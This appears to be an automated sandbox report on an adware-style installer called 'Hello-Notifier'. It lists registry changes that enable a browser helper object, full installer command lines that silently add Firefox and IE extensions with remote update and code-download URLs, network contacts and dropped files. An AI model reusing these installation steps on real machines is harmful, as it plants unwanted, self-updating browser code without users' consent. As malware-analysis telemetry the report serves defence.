| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\22\Name = "resources" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\ = "CrossriderApp0037928 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} | C:\Windows\system32\regsvr32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe
"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
"C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /installapp /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log' /downloadfromlocalpath='file://C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\extensionData'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe" /updateapp /dontsenddaily /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /runfrom=installer-update /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll"
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe" /executebg /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe
"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe" /enablebho /agentregpath='Hello-Notifier' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110311791128 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | errors.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | errors.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.srvstatsdata.com | udp |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| SG | 13.251.16.150:80 | update.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | update.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.srvstatsdata.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.mstatsserv.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | app-static.crossrider.com | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| SG | 13.251.16.150:80 | stats.srvstatsdata.com | tcp |
| US | 8.8.8.8:53 | stats.mstatsserv.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\System.dll
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\WrapperUtils.dll
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\StdUtils.dll
C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsislog.dll
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils2.dll
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\nsisos.dll
C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\md5dll.dll
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\InstallerUtils.dll
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\UserInfo.dll
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\inetc.dll
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\temp_file_after.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3yrocb08.Admin\extensions\b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com\skin\crossrider_statusbar.png
C:\Users\Admin\AppData\Local\Temp\nsp9F01.tmp\ExecDos.dll
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win7-20240903-en
Max time kernel
118s
Max time network
123s
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220
Analysis: behavioral6
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win10v2004-20241007-en
Max time kernel
99s
Max time network
102s
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3516 wrote to memory of 3552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3552 -ip 3552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 612
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.11.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.108.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Analysis: behavioral7
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:20
Platform
win7-20240903-en
Max time kernel
118s
Max time network
121s
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 220
Analysis: behavioral8
Detonation Overview
Submitted
2024-10-25 22:18
Reported
2024-10-25 22:21
Platform
win10v2004-20241007-en
Max time kernel
109s
Max time network
117s
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4832 wrote to memory of 4836 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\WrapperUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4836 -ip 4836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.11.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |